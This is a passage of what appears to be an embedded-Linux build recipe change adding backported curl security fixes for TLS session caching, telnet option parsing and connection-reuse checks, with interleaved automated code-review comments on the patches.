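+index 1d09cadca..64f43605a 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -422,12 +422,23 @@ static int ossl_get_ssl_conn_index(void)
+ */
+ static int ossl_get_ssl_sockindex_index(void)
+ {
+- static int ssl_ex_data_sockindex_index = -1;
+- if(ssl_ex_data_sockindex_index < 0) {
+- ssl_ex_data_sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL,
+- NULL);
++ static int sockindex_index = -1;
++ if(sockindex_index < 0) {
++ sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
+ }
+- return ssl_ex_data_sockindex_index;
++ return sockindex_index;
++}
++
++/* Return an extra data index for proxy boolean.
++ * This index can be used with SSL_get_ex_data() and SSL_set_ex_data().
++ */
++static int ossl_get_proxy_index(void)
++{
++ static int proxy_index = -1;
++ if(proxy_index < 0) {
++ proxy_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
++ }
++ return proxy_index;
+ }
+
+ static int passwd_callback(char *buf, int num, int encrypting,
+@@ -1079,7 +1090,8 @@ static int Curl_ossl_init(void)
+ #endif
+
+ /* Initialize the extra data indexes */
+- if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0)
++ if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0 ||
++ ossl_get_proxy_index() < 0)
+ return 0;
+
+ return 1;
+@@ -2341,8 +2353,10 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ curl_socket_t *sockindex_ptr;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
++ bool isproxy;
+
+- if(connectdata_idx < 0 || sockindex_idx < 0)
++ if(connectdata_idx < 0 || sockindex_idx < 0 || proxy_idx < 0)
+ return 0;
+
+ conn = (struct connectdata*) SSL_get_ex_data(ssl, connectdata_idx);
+@@ -2355,13 +2369,18 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ sockindex_ptr = (curl_socket_t*) SSL_get_ex_data(ssl, sockindex_idx);
+ sockindex = (int)(sockindex_ptr - conn->sock);
+
++ isproxy = SSL_get_ex_data(ssl, proxy_idx) ? TRUE : FALSE;
++
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ bool incache;
+ void *old_ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
+- sockindex));
++ if(isproxy)
++ incache = FALSE;
++ else
++ incache = !(Curl_ssl_getsessionid(conn, isproxy,
++ &old_ssl_sessionid, NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -2371,7 +2390,7 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ }
+
+ if(!incache) {
+- if(!Curl_ssl_addsessionid(conn, ssl_sessionid,
++ if(!Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid,
+ 0 /* unknown size */, sockindex)) {
+ /* the session has been put into the session cache */
+ res = 1;
+@@ -2868,16 +2887,25 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
+
+- if(connectdata_idx >= 0 && sockindex_idx >= 0) {
++ if(connectdata_idx >= 0 && sockindex_idx >= 0 && proxy_idx >= 0) {
+ /* Store the data needed for the "new session" callback.
+ * The sockindex is stored as a pointer to an array element. */
+ SSL_set_ex_data(BACKEND->handle, connectdata_idx, conn);
+ SSL_set_ex_data(BACKEND->handle, sockindex_idx, conn->sock + sockindex);
++#ifndef CURL_DISABLE_PROXY
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, SSL_IS_PROXY() ? (void *) 1:
++ NULL);
++#else
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, NULL);
++#endif
++
+ }
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+diff --git a/lib/vtls/schannel.c b/lib/vtls/schannel.c
+index f665ee340..a354ce95d 100644
+--- a/lib/vtls/schannel.c
++++ b/lib/vtls/schannel.c
+@@ -487,7 +487,8 @@ schannel_connect_step1(struct connectdata *conn, int sockindex)
+ /* check for an existing re-usable credential handle */
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ (void **)&old_cred, NULL, sockindex)) {
+ BACKEND->cred = old_cred;
+ DEBUGF(infof(data, "schannel: re-using existing credential handle\n"));
+
+@@ -1193,8 +1194,9 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ struct ssl_connect_data *connssl = &conn->ssl[sockindex];
+ SECURITY_STATUS sspi_status = SEC_E_OK;
+ CERT_CONTEXT *ccert_context = NULL;
++ bool isproxy = SSL_IS_PROXY();
+ #ifdef DEBUGBUILD
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ #endif
+ #ifdef HAS_ALPN
+@@ -1268,7 +1270,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ struct curl_schannel_cred *old_cred = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, (void **)&old_cred, NULL,
+ sockindex));
+ if(incache) {
+ if(old_cred != BACKEND->cred) {
+@@ -1280,7 +1282,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ }
+ }
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, (void *)BACKEND->cred,
++ result = Curl_ssl_addsessionid(conn, isproxy, (void *)BACKEND->cred,
+ sizeof(struct curl_schannel_cred),
+ sockindex);
+ if(result) {
+diff --git a/lib/vtls/sectransp.c b/lib/vtls/sectransp.c
+index 7dd028fb7..9c67d465a 100644
+--- a/lib/vtls/sectransp.c
++++ b/lib/vtls/sectransp.c
+@@ -1376,7 +1376,8 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ bool isproxy = SSL_IS_PROXY();
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+ #ifdef ENABLE_IPV6
+@@ -1584,7 +1585,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+
+ #ifdef USE_NGHTTP2
+ if(data->set.httpversion >= CURL_HTTP_VERSION_2 &&
+- (!SSL_IS_PROXY() || !conn->bits.tunnel_proxy)) {
++ (!isproxy || !conn->bits.tunnel_proxy)) {
+ CFArrayAppendValue(alpnArr, CFSTR(NGHTTP2_PROTO_VERSION_ID));
+ infof(data, "ALPN, offering %s\n", NGHTTP2_PROTO_VERSION_ID);
+ }
+@@ -1916,7 +1917,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ size_t ssl_sessionid_len;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&ssl_sessionid,
++ if(!Curl_ssl_getsessionid(conn, isproxy, (void **)&ssl_sessionid,
+ &ssl_sessionid_len, sockindex)) {
+ /* we got a session id, use it! */
+ err = SSLSetPeerID(BACKEND->ssl_ctx, ssl_sessionid, ssl_sessionid_len);
+@@ -1944,7 +1945,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ return CURLE_SSL_CONNECT_ERROR;
+ }
+
+- result = Curl_ssl_addsessionid(conn, ssl_sessionid, ssl_sessionid_len,
++ result = Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid, ssl_sessionid_len,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index dfefa1bd5..aaf73ef8f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -305,6 +305,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn)
+ * there's one suitable, it is provided. Returns TRUE when no entry matched.
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex)
+@@ -315,7 +316,6 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ long *general_age;
+ bool no_match = TRUE;
+
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+@@ -324,6 +324,11 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ int port = isProxy ? (int)conn->port : conn->remote_port;
+ *ssl_sessionid = NULL;
+
++#ifdef CURL_DISABLE_PROXY
++ if(isProxy)
++ return TRUE;
++#endif
++
+ DEBUGASSERT(SSL_SET_OPTION(primary.sessionid));
+
+ if(!SSL_SET_OPTION(primary.sessionid))
+@@ -411,6 +416,7 @@ void Curl_ssl_delsessionid(struct connectdata *conn, void *ssl_sessionid)
+ * later on.
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex)
+@@ -423,7 +429,6 @@ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
+ char *clone_conn_to_host;
+ int conn_to_port;
+ long *general_age;
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+diff --git a/lib/vtls/vtls.h b/lib/vtls/vtls.h
+index a81b2f22d..a5e348752 100644
+--- a/lib/vtls/vtls.h
++++ b/lib/vtls/vtls.h
+@@ -202,6 +202,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn);
+ * under sessionid mutex).
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isproxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex);
+@@ -211,6 +212,7 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ * object with cache (e.g. incrementing refcount on success)
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex);
+diff --git a/lib/vtls/wolfssl.c b/lib/vtls/wolfssl.c
+index 8c2d3f4a2..dd9f907ff 100644
+--- a/lib/vtls/wolfssl.c
++++ b/lib/vtls/wolfssl.c
+@@ -392,7 +392,8 @@ wolfssl_connect_step1(struct connectdata *conn,
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ char error_buffer[WOLFSSL_MAX_ERROR_SZ];
+@@ -618,9 +619,10 @@ wolfssl_connect_step3(struct connectdata *conn,
+ void *old_ssl_sessionid = NULL;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+@@ -631,7 +633,7 @@ wolfssl_connect_step3(struct connectdata *conn,
+ }
+
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, our_ssl_sessionid,
++ result = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid,
+ 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+--
+2.20.1
+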
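Review bot: In the mesalink.c part of this backport, `mesalink_connect_step3` declares `bool inproxy = SSL_IS_PROXY() ? TRUE : FALSE;`, but the rewritten `Curl_ssl_getsessionid` and `Curl_ssl_addsessionid` calls below it pass `isproxy`, a name the visible lines never declare, so a MesaLink-enabled build would presumably stop compiling. The declaration should read `bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;`, since that flag is what separates proxy sessions from origin sessions in the cache. In `wolfssl_connect_step3` the new `bool isproxy` is declared after the `our_ssl_sessionid = SSL_get_session(...)` statement; moving it up with the other locals avoids a declaration-after-statement warning. Both functions start and end outside their hunks, so this is judged from the visible lines only.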
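--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
@@ -0,0 +1,26 @@
+From 39ce47f219b09c380b81f89fe54ac586c8db6bde Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Fri, 7 May 2021 13:09:57 +0200
+Subject: [PATCH] telnet: check sscanf() for correct number of matches
+
+CVE: CVE-2021-22898
+Upstream-Status: Backport
+Link: https://github.com/curl/curl/commit/39ce47f219b09c380b81f89fe54ac586c8db6bde
+Bug: https://curl.se/docs/CVE-2021-22898.html
+---
+ lib/telnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 26e0658ba9cc..fdd137fb0c04 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -922,7 +922,7 @@ static void suboption(struct Curl_easy *data)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
++ if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+ CURL_NEW_ENV_VALUE, varval);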
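--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
@@ -0,0 +1,226 @@
+Subject: [PATCH] vtls: fix connection reuse checks for issuer cert and
+ case sensitivity CVE-2021-22924
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2021-22924.html
+CVE: CVE-2021-22924
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/url.c | 5 +++--
+ lib/urldata.h | 2 +-
+ lib/vtls/gtls.c | 10 +++++-----
+ lib/vtls/nss.c | 4 ++--
+ lib/vtls/openssl.c | 12 ++++++------
+ lib/vtls/vtls.c | 23 ++++++++++++++++++-----
+ 6 files changed, 35 insertions(+), 21 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 47fc66aed..eebad8d32 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -3555,6 +3555,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.proxy_ssl.primary.CApath = data->set.str[STRING_SSL_CAPATH_PROXY];
+ data->set.ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_ORIG];
+ data->set.proxy_ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_PROXY];
++ data->set.ssl.primary.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
++ data->set.proxy_ssl.primary.issuercert =
++ data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.primary.random_file = data->set.str[STRING_SSL_RANDOM_FILE];
+ data->set.proxy_ssl.primary.random_file =
+ data->set.str[STRING_SSL_RANDOM_FILE];
+@@ -3575,8 +3578,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+
+ data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+ data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
+- data->set.ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
+- data->set.proxy_ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+ data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fbb8b645e..615fbf369 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -224,6 +224,7 @@ struct ssl_primary_config {
+ long version_max; /* max supported version the client wants to use*/
+ char *CApath; /* certificate dir (doesn't work on windows) */
+ char *CAfile; /* certificate to verify peer against */
++ char *issuercert; /* optional issuer certificate filename */
+ char *clientcert;
+ char *random_file; /* path to file containing "random" data */
+ char *egdsocket; /* path to file containing the EGD daemon socket */
+@@ -240,7 +241,6 @@ struct ssl_config_data {
+ struct ssl_primary_config primary;
+ long certverifyresult; /* result from the certificate verification */
+ char *CRLfile; /* CRL to check certificate revocation */
+- char *issuercert;/* optional issuer certificate filename */
+ curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+ void *fsslctxp; /* parameter for call back */
+ char *cert; /* client certificate file name */
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 46e149c7d..8c051024f 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -1059,7 +1059,7 @@ gtls_connect_step3(struct connectdata *conn,
+ if(!chainp) {
+ if(SSL_CONN_CONFIG(verifypeer) ||
+ SSL_CONN_CONFIG(verifyhost) ||
+- SSL_SET_OPTION(issuercert)) {
++ SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+ if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+ && SSL_SET_OPTION(username) != NULL
+@@ -1241,21 +1241,21 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_x509_crt_t format */
+ gnutls_x509_crt_import(x509_cert, chainp, GNUTLS_X509_FMT_DER);
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ gnutls_x509_crt_init(&x509_issuer);
+- issuerp = load_file(SSL_SET_OPTION(issuercert));
++ issuerp = load_file(SSL_CONN_CONFIG(issuercert));
+ gnutls_x509_crt_import(x509_issuer, &issuerp, GNUTLS_X509_FMT_PEM);
+ rc = gnutls_x509_crt_check_issuer(x509_cert, x509_issuer);
+ gnutls_x509_crt_deinit(x509_issuer);
+ unload_file(issuerp);
+ if(rc <= 0) {
+ failf(data, "server certificate issuer check failed (IssuerCert: %s)",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ gnutls_x509_crt_deinit(x509_cert);
+ return CURLE_SSL_ISSUER_ERROR;
+ }
+ infof(data, "\t server certificate issuer check OK (Issuer Cert: %s)\n",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ }
+
+ size = sizeof(certbuf);
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index ef51b0d91..375c78b1b 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -2151,9 +2151,9 @@ static CURLcode nss_do_connect(struct connectdata *conn, int sockindex)
+ if(result)
+ goto error;
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ SECStatus ret = SECFailure;
+- char *nickname = dup_nickname(data, SSL_SET_OPTION(issuercert));
++ char *nickname = dup_nickname(data, SSL_CONN_CONFIG(issuercert));
+ if(nickname) {
+ /* we support only nicknames in case of issuercert for now */
+ ret = check_issuer_cert(BACKEND->handle, nickname);
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 64f43605a..7e81fd3a0 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -3547,7 +3547,7 @@ static CURLcode servercert(struct connectdata *conn,
+ deallocating the certificate. */
+
+ /* e.g. match issuer name with provided issuer certificate */
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ fp = BIO_new(BIO_s_file());
+ if(fp == NULL) {
+ failf(data,
+@@ -3560,10 +3560,10 @@ static CURLcode servercert(struct connectdata *conn,
+ return CURLE_OUT_OF_MEMORY;
+ }
+
+- if(BIO_read_filename(fp, SSL_SET_OPTION(issuercert)) <= 0) {
++ if(BIO_read_filename(fp, SSL_CONN_CONFIG(issuercert)) <= 0) {
+ if(strict)
+ failf(data, "SSL: Unable to open issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(BACKEND->server_cert);
+ BACKEND->server_cert = NULL;
+@@ -3574,7 +3574,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(!issuer) {
+ if(strict)
+ failf(data, "SSL: Unable to read issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3585,7 +3585,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(X509_check_issued(issuer, BACKEND->server_cert) != X509_V_OK) {
+ if(strict)
+ failf(data, "SSL: Certificate issuer check failed (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3594,7 +3594,7 @@ static CURLcode servercert(struct connectdata *conn,
+ }
+
+ infof(data, " SSL certificate issuer check ok (%s)\n",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index aaf73ef8f..8c681da14 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,6 +82,16 @@
+ else \
+ dest->var = NULL;
+
++static bool safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ else if(!a && !b)
++ return TRUE; /* match */
++ return FALSE; /* no match */
++}
++
++
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ struct ssl_primary_config* needle)
+@@ -91,11 +101,12 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- Curl_safe_strcasecompare(data->CApath, needle->CApath) &&
+- Curl_safe_strcasecompare(data->CAfile, needle->CAfile) &&
+- Curl_safe_strcasecompare(data->clientcert, needle->clientcert) &&
+- Curl_safe_strcasecompare(data->random_file, needle->random_file) &&
+- Curl_safe_strcasecompare(data->egdsocket, needle->egdsocket) &&
++ safecmp(data->CApath, needle->CApath) &&
++ safecmp(data->CAfile, needle->CAfile) &&
++ safecmp(data->issuercert, needle->issuercert) &&
++ safecmp(data->clientcert, needle->clientcert) &&
++ safecmp(data->random_file, needle->random_file) &&
++ safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+@@ -117,6 +128,7 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+
+ CLONE_STRING(CApath);
+ CLONE_STRING(CAfile);
++ CLONE_STRING(issuercert);
+ CLONE_STRING(clientcert);
+ CLONE_STRING(random_file);
+ CLONE_STRING(egdsocket);
+@@ -131,6 +143,7 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ {
+ Curl_safefree(sslc->CApath);
+ Curl_safefree(sslc->CAfile);
++ Curl_safefree(sslc->issuercert);
+ Curl_safefree(sslc->clientcert);
+ Curl_safefree(sslc->random_file);
+ Curl_safefree(sslc->egdsocket);
+--
+2.30.2
+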
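Review bot: `Curl_ssl_config_matches` in the vtls.c hunk still compares `pinned_key` with `Curl_safe_strcasecompare`, although a pin is a file name or a base64 hash and both are case-sensitive, so two configurations whose pins differ only in letter case would still count as equal when a connection is picked for reuse. If the backport may go beyond the change it copies, that last line would become `safecmp(data->pinned_key, needle->pinned_key))`. The new helper only reads its arguments, so `static bool safecmp(const char *a, const char *b)` states that more precisely. The body of `Curl_ssl_config_matches` starts outside the hunk, so any earlier comparisons are not visible here.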
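--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
@@ -0,0 +1,43 @@
+Subject: [PATCH] telnet: fix option parser to not send uninitialized
+ contents CVE-2021-22925
+
+Reported-by: Red Hat Product Security
+Bug: https://curl.se/docs/CVE-2021-22925.html
+CVE: CVE-2021-22925
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/telnet.c | 17 +++++++++++------
+ 1 file changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 4bf4c652c..3347ad6d1 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -967,12 +967,17 @@ static void suboption(struct connectdata *conn)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+- msnprintf((char *)&temp[len], sizeof(temp) - len,
+- "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+- CURL_NEW_ENV_VALUE, varval);
+- len += tmplen;
+- }
++ int rv;
++ char sep[2] = "";
++ varval[0] = 0;
++ rv = sscanf(v->data, "%127[^,]%1[,]%127s", varname, sep, varval);
++ if(rv == 1)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s", CURL_NEW_ENV_VAR, varname);
++ else if(rv >= 2)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
++ CURL_NEW_ENV_VALUE, varval);
+ }
+ }
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+--
+2.30.2
+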
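Review bot: The removed lines of this hunk already contain the `== 2` comparison, so the patch applies only on top of CVE-2021-22898.patch from the same commit; the recipe's SRC_URI, which is not visible here, has to list that patch first. The two new branches are undocumented: a comment such as `/* rv == 1: name without a value, send the name only */` on the first and `/* rv >= 2: separator seen; varval was cleared above, so it is empty when no value followed */` on the second would record why `varval[0] = 0` and `sep` exist. `suboption` starts and ends outside the hunk.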
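--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
@@ -0,0 +1,86 @@
+Backport of:
+
+From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 21 Sep 2020 09:15:51 +0200
+Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy"
+
+When using HTTPS proxy, SSL is used but not in the view of the FTP
+protocol handler itself so separate the connection's use of SSL from the
+FTP control connection's sue.
+
+Reported-by: Mingtao Yang
+Fixes #5523
+Closes #6006
+
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/ftp.c | 13 ++++++-------
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 3382772..677527f 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn)
+ {
+ CURLcode result = CURLE_OK;
+
+- if(conn->ssl[FIRSTSOCKET].use) {
++ if(conn->bits.ftp_use_control_ssl) {
+ /* PBSZ = PROTECTION BUFFER SIZE.
+
+ The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says:
+@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ }
+ #endif
+
+- if(data->set.use_ssl &&
+- (!conn->ssl[FIRSTSOCKET].use ||
+- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] &&
+- !conn->proxy_ssl[FIRSTSOCKET].use))) {
+- /* We don't have a SSL/TLS connection yet, but FTPS is
++ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) {
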